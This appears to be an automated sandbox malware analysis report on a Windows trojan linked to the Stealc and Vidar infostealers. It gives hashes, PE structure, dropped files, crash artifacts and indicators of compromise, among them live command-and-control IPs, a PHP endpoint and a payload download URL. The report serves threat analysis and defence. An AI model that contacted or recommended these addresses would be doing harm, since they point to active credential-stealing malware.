                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:ief722WreR.exe
                                renamed because original name is a hash value
                                Original Sample Name:0b9795bc5978c62899793b157271e979.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@4/7@1/3
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 92%
                                • Number of executed functions: 52
                                • Number of non-executed functions: 337
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.246.63, 4.175.87.197, 40.126.53.16
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: ief722WreR.exe
                                TimeTypeDescription
                                11:42:07API Interceptor8751948x Sleep call for process: ief722WreR.exe modified
                                13:19:00API Interceptor1x Sleep call for process: WerFault.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                104.21.56.707gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                  YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                    vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                      Tg3sk2wywR.exeGet hashmaliciousStealcBrowse
                                        x8AH98H0eQ.exeGet hashmaliciousStealcBrowse
                                          x8AH98H0eQ.exeGet hashmaliciousUnknownBrowse
                                            zGHItMC5Zc.exeGet hashmaliciousStealcBrowse
                                              ozcAR7VO6Y.exeGet hashmaliciousStealcBrowse
                                                9gBcr7l7jT.exeGet hashmaliciousStealcBrowse
                                                  Zbls3lMGhD.exeGet hashmaliciousStealcBrowse
                                                    92.255.57.89yZB8qfUJJu.exeGet hashmaliciousStealcBrowse
                                                    • 92.255.57.89/45c616e921a794b8.php
                                                    5gR5rEGCfw.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 92.255.57.89/45c616e921a794b8.php
                                                    7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                    • 92.255.57.89/45c616e921a794b8.php
                                                    176.113.115.197gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    post-to-me.com7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                    • 104.21.56.70
                                                    YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 104.21.56.70
                                                    6X4BIzTTBR.exeGet hashmaliciousStealcBrowse
                                                    • 172.67.179.207
                                                    vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 104.21.56.70
                                                    IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 172.67.179.207
                                                    XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                                    • 172.67.179.207
                                                    0r9PL33C8E.exeGet hashmaliciousStealcBrowse
                                                    • 172.67.179.207
                                                    Pw2KHOL9Z8.exeGet hashmaliciousStealcBrowse
                                                    • 172.67.179.207
                                                    Tg3sk2wywR.exeGet hashmaliciousStealcBrowse
                                                    • 104.21.56.70
                                                    x8AH98H0eQ.exeGet hashmaliciousStealcBrowse
                                                    • 104.21.56.70
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSAdobePDQ5.6.1.msiGet hashmaliciousUnknownBrowse
                                                    • 162.159.140.238
                                                    AdobeViewerPDQv2.msiGet hashmaliciousUnknownBrowse
                                                    • 162.159.140.238
                                                    https://desactivacion-correo.s3.eu-north-1.amazonaws.com/es.htmlGet hashmaliciousUnknownBrowse
                                                    • 172.67.8.141
                                                    https://app.droplet.io/form/Ko1loyGet hashmaliciousUnknownBrowse
                                                    • 104.18.17.155
                                                    http://riginaros.blogspot.com/#x034rT96G0Get hashmaliciousPorn ScamBrowse
                                                    • 104.21.16.1
                                                    download.ps1Get hashmaliciousPython BackDoorBrowse
                                                    • 104.20.22.46
                                                    https://8lye.zemifor.ru/AELKFIZNEFDBTAHDVVECCPNIETD459FBOSL3MNKP6ZQ?akpsmqmipdifvgvgwktrpvk235317236085203wfjcuo8jl4u8d22sbGet hashmaliciousUnknownBrowse
                                                    • 104.21.30.120
                                                    1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 172.64.41.3
                                                    REMITTANCE_100NzA1Sada.htmGet hashmaliciousUnknownBrowse
                                                    • 162.159.140.237
                                                    REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                    • 188.114.96.6
                                                    TELSPRUyZB8qfUJJu.exeGet hashmaliciousStealcBrowse
                                                    • 92.255.57.89
                                                    5gR5rEGCfw.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 92.255.57.89
                                                    7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                    • 92.255.57.89
                                                    https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9Get hashmaliciousUnknownBrowse
                                                    • 92.255.57.144
                                                    https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                                    • 92.255.57.155
                                                    S1NrYNOYhZ.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 92.255.57.88
                                                    S4h5LcSjJc.exeGet hashmaliciousStealcBrowse
                                                    • 92.255.57.88
                                                    8z6iZ5YzKB.exeGet hashmaliciousStealcBrowse
                                                    • 92.255.57.88
                                                    sXWh51zcTv.exeGet hashmaliciousStealcBrowse
                                                    • 92.255.57.88
                                                    cTjQ45fs0O.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 92.255.57.88
                                                    SELECTELRU5gR5rEGCfw.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 176.113.115.215
                                                    7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                    • 176.113.115.19
                                                    la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 45.89.231.211
                                                    5EZLEXDveC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                    • 176.113.115.163
                                                    teste.sh4.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                    • 45.138.214.123
                                                    xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                    • 176.124.33.0
                                                    YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 176.113.115.37
                                                    442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                    • 109.234.156.179
                                                    442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                    • 109.234.156.179
                                                    nabppc.elfGet hashmaliciousUnknownBrowse
                                                    • 85.119.147.53
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    37f463bf4616ecd445d4a1937da06e19REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                    • 104.21.56.70
                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                    • 104.21.56.70
                                                    ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 104.21.56.70
                                                    7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                    • 104.21.56.70
                                                    PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                    • 104.21.56.70
                                                    FPqVs6et5F.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.56.70
                                                    c2.htaGet hashmaliciousXWormBrowse
                                                    • 104.21.56.70
                                                    document.pif.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 104.21.56.70
                                                    lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                    • 104.21.56.70
                                                    Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                    • 104.21.56.70
                                                    No context
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.966646448906164
                                                    Encrypted:false
                                                    SSDEEP:192:6Eqy1Sx0kXkstOgAhjucZrP2izuiFJZ24IO84XU:6TGSykXkstOZjNFzuiFJY4IO86
                                                    MD5:FC02FB1B72D0D390D16E1B7B5D5F0D11
                                                    SHA1:EA0C67FBF9047FD8E81CCE177B2A1A70AB18C66C
                                                    SHA-256:33C0D5791C30C84F8453E3F5DFAAA6ADA2B6944931CFC57E6691E63F64495019
                                                    SHA-512:FFA4A1B6C20BBB910DAF64F0DA8E6E48C9C918EEE5E79CB4FB9469015E8D2D937CA9AC924E4CCC1FFA45C3FB6BA664698408E650CED86B964597EC8D8901DA3F
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.2.8.3.0.9.7.6.8.3.8.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.2.8.3.1.0.3.3.0.8.2.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.4.e.6.0.9.a.-.6.3.7.f.-.4.d.b.f.-.a.0.0.0.-.5.8.a.9.3.8.5.8.c.1.1.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.7.d.d.f.9.a.-.a.a.5.7.-.4.c.3.c.-.b.4.b.f.-.7.d.1.c.a.3.d.0.2.6.c.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.A.D.E...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.3.4.-.0.0.0.1.-.0.0.1.4.-.4.e.a.0.-.d.9.7.4.2.2.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.a.d.3.7.1.5.7.6.0.f.8.c.4.9.d.4.4.9.8.e.9.d.4.5.4.7.c.2.9.3.0.0.0.0.1.5.0.6.!.0.0.0.0.2.1.2.a.9.b.2.4.2.5.a.3.b.7.e.a.5.8.6.1.d.f.c.8.2.0.4.8.4.7.b.f.5.8.7.2.d.0.b.e.!.D.A.D.E...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 18:18:29 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):62288
                                                    Entropy (8bit):1.8180793469528476
                                                    Encrypted:false
                                                    SSDEEP:192:xLVB+6X4vhBvDXn7OIOJwbH7cHG37gg46za4WHGJ4gGUtDuUG30hq7nhjO3b+:r8vhBveIEKAwuTmJld8kWj/
                                                    MD5:AD5642C7BDE3F0A12C2621C6D8331C65
                                                    SHA1:D4C45E6F9B0FC97407CC862AC6F0B69095E43F94
                                                    SHA-256:FCA61A7CC8C641FE175780E7A22AB9FC7AB035D37B9C48A6E8A616E934168FCF
                                                    SHA-512:7B5820D580EFF0DF51C046C8E9AC6AD02BF6A7D49E75199BC592BF504F7D1146CD0BD52B3121CE1041BE68119783DA73DAEDE6E7E30CCB16126E76638755DB92
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:MDMP..a..... .........Xg............4...............<............*..........T.......8...........T...........x3.........................................................................................................eJ......H.......GenuineIntel............T.......4...aoXg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8328
                                                    Entropy (8bit):3.694292384375268
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJF06q0mv6YsQ6lbgmfb4t8ibapDy89bHVsfzNm:R6lXJG6fmv6YD6lbgmfbe8ibMHufE
                                                    MD5:525D28ED1FDC4EEA645AA6EAE62B04CD
                                                    SHA1:42924D3B482BCB2D0DD06DBDCBD52234FC2BC6FB
                                                    SHA-256:CB4AB68D272B2366B657CA0683C9DF0FAAA1052845E441284305D798E5481DE6
                                                    SHA-512:601F2A9C994EAE14DD6BACD264B4F77F171C8144C16A4597CB7688D34694BD066BF5C83A100C2BE6C080A5D968DFD357E0B2366DD421F69A480333E946C81A2C
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.<./.P.i.d.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4575
                                                    Entropy (8bit):4.4528149916088955
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsZJg77aI96A+XWpW8VYXYm8M4JVwEeFSj+q8ixLx9lguzyuUd:uIjfrI7cA+m7VHJTjfx9bz/Ud
                                                    MD5:60569DA63264AA06CDEA560E0F0763BB
                                                    SHA1:658899EB04328D9E266F654D85BFA65A42F2365D
                                                    SHA-256:C2071237847DD6669D6CA6104404A5BCAAEC7097109A384DDB5327517B0D2CC2
                                                    SHA-512:10630DAE5C026EECB71C07A5E7A744A74E3AEBF7B91215241DE42735E8EDB0EC372507BE5657D257947C188DEF6C12C0B8C89BA11827C30F92A0B26931EBCD2A
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625521" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Users\user\Desktop\ief722WreR.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:modified
                                                    Size (bytes):303104
                                                    Entropy (8bit):6.247547894665839
                                                    Encrypted:false
                                                    SSDEEP:6144:Ea5OEPJcQ7Tk95eOT0XJaj2L6lqAgLhu:YQHk95eOT0vL0qV
                                                    MD5:017E73F6839555AA663A62235A81B433
                                                    SHA1:212A9B2425A3B7EA5861DFC8204847BF5872D0BE
                                                    SHA-256:41C2C33823D372F8389B978FDAEF60EB6D02AEA21BF20B1AAD7A11BDE5F5DCA8
                                                    SHA-512:C6EC29111019290C60202053674725B6CD978C599843D7E7EEEF9482809EC9EDBCA18B5181B764A9DAB2E3C9E5A76F34B8841E1B2FA6EBFFA0C52A4588023641
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L...=..d......................?...................@...........................B.............................................4...<.....@.................................................................................`............................text............................... ..`.rdata..L ......."..................@..@.data....=..0...l..................@....rsrc.........@.....................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\ief722WreR.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):303104
                                                    Entropy (8bit):6.247547894665839
                                                    Encrypted:false
                                                    SSDEEP:6144:Ea5OEPJcQ7Tk95eOT0XJaj2L6lqAgLhu:YQHk95eOT0vL0qV
                                                    MD5:017E73F6839555AA663A62235A81B433
                                                    SHA1:212A9B2425A3B7EA5861DFC8204847BF5872D0BE
                                                    SHA-256:41C2C33823D372F8389B978FDAEF60EB6D02AEA21BF20B1AAD7A11BDE5F5DCA8
                                                    SHA-512:C6EC29111019290C60202053674725B6CD978C599843D7E7EEEF9482809EC9EDBCA18B5181B764A9DAB2E3C9E5A76F34B8841E1B2FA6EBFFA0C52A4588023641
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L...=..d......................?...................@...........................B.............................................4...<.....@.................................................................................`............................text............................... ..`.rdata..L ......."..................@..@.data....=..0...l..................@....rsrc.........@.....................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.416622393547009
                                                    Encrypted:false
                                                    SSDEEP:6144:Fcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNa5+:ii58oSWIZBk2MM6AFBko
                                                    MD5:D17643091187307C466D93F80417E63A
                                                    SHA1:15042029AE7623A333B4814AA0380D650E992404
                                                    SHA-256:19ADFB2D9E2FC6E683E5E41B494E4272A020895E72241D0F829E4F81B1FEB87E
                                                    SHA-512:F8B8359FBA9BC48FBAFF4D2F51ED71FEBBF908B15A42690A039F3B08419B47D9D31A89BE7D38BF6E047FB086E4CEFC0D65092232126F10A4FC242DE072C70D59
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm>d../K..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):6.967371171299938
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:ief722WreR.exe
                                                    File size:429'568 bytes
                                                    MD5:0b9795bc5978c62899793b157271e979
                                                    SHA1:d31405a2caf535d882fe873473df1badd7d5d028
                                                    SHA256:60af68dc8e940dae29691baa206ab9638bcff227b814c6cc33420edc0b3ac80b
                                                    SHA512:ba7054eaa9ae5eb5a17fbb30a9ed0200cc11fee439d7795b6e78ea8fce3c5592ed6710eac1ecf5396ece510cf4972ae870e16de38af17580586cc39d0ad2387e
                                                    SSDEEP:12288:K3r16Nwm9j++TwWOQzHfFlQps+QMUoF9AFs7:K71wF++TLOYFl9MUo7AFs7
                                                    TLSH:2194E04175F1D821EEF75B711970E6A40ABBBC636B71519E3694B65F2E332E0CA21303
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L....".e...
                                                    Icon Hash:46c7c30b0f4e0d19
                                                    Entrypoint:0x4014f7
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x65A522B6 [Mon Jan 15 12:19:02 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:d3b3bde725d7f4017897955975268d5d
                                                    Instruction
                                                    call 00007F75ECCD0960h
                                                    jmp 00007F75ECCCDE5Dh
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 00000328h
                                                    mov dword ptr [00454878h], eax
                                                    mov dword ptr [00454874h], ecx
                                                    mov dword ptr [00454870h], edx
                                                    mov dword ptr [0045486Ch], ebx
                                                    mov dword ptr [00454868h], esi
                                                    mov dword ptr [00454864h], edi
                                                    mov word ptr [00454890h], ss
                                                    mov word ptr [00454884h], cs
                                                    mov word ptr [00454860h], ds
                                                    mov word ptr [0045485Ch], es
                                                    mov word ptr [00454858h], fs
                                                    mov word ptr [00454854h], gs
                                                    pushfd
                                                    pop dword ptr [00454888h]
                                                    mov eax, dword ptr [ebp+00h]
                                                    mov dword ptr [0045487Ch], eax
                                                    mov eax, dword ptr [ebp+04h]
                                                    mov dword ptr [00454880h], eax
                                                    lea eax, dword ptr [ebp+08h]
                                                    mov dword ptr [0045488Ch], eax
                                                    mov eax, dword ptr [ebp-00000320h]
                                                    mov dword ptr [004547C8h], 00010001h
                                                    mov eax, dword ptr [00454880h]
                                                    mov dword ptr [0045477Ch], eax
                                                    mov dword ptr [00454770h], C0000409h
                                                    mov dword ptr [00454774h], 00000001h
                                                    mov eax, dword ptr [00452004h]
                                                    mov dword ptr [ebp-00000328h], eax
                                                    mov eax, dword ptr [00452008h]
                                                    mov dword ptr [ebp-00000324h], eax
                                                    call dword ptr [000000B4h]
                                                    Programming Language:
                                                    • [C++] VS2008 build 21022
                                                    • [ASM] VS2008 build 21022
                                                    • [ C ] VS2008 build 21022
                                                    • [IMP] VS2005 build 50727
                                                    • [RES] VS2008 build 21022
                                                    • [LNK] VS2008 build 21022
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x508340x3c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x42e0000x11cc8.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x504f80x40.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x4f0000x160.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x4dccc0x4de00cc5bee7963cf813b632d57b3f0622a30False0.8526566262038523data7.553001973414483IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x4f0000x204c0x22007f010f040da264d9dc64b82bba55b25cFalse0.35994944852941174data5.4126526275478986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x520000x3db0d80x6c00b9a76504a8cf3311613e2dc773a194f9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x42e0000x11cc80x11e005d54ec624e8b578d6d368ac1d1559939False0.5183703015734266data5.465191984718679IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_CURSOR0x4391a80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                    RT_CURSOR0x4392d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                    RT_CURSOR0x43b8a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                    RT_ICON0x42e6f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SyriacSyriac0.36353944562899787
                                                    RT_ICON0x42f5980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SyriacSyriac0.5094765342960289
                                                    RT_ICON0x42fe400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SyriacSyriac0.591589861751152
                                                    RT_ICON0x4305080x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SyriacSyriac0.6163294797687862
                                                    RT_ICON0x430a700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SyriacSyriac0.3578799249530957
                                                    RT_ICON0x431b180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SyriacSyriac0.35081967213114756
                                                    RT_ICON0x4324a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SyriacSyriac0.40425531914893614
                                                    RT_ICON0x4329700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSyriacSyriac0.8278251599147122
                                                    RT_ICON0x4338180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSyriacSyriac0.8330324909747292
                                                    RT_ICON0x4340c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSyriacSyriac0.7995391705069125
                                                    RT_ICON0x4347880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSyriacSyriac0.7088150289017341
                                                    RT_ICON0x434cf00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SyriacSyriac0.803941908713693
                                                    RT_ICON0x4372980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SyriacSyriac0.8325515947467167
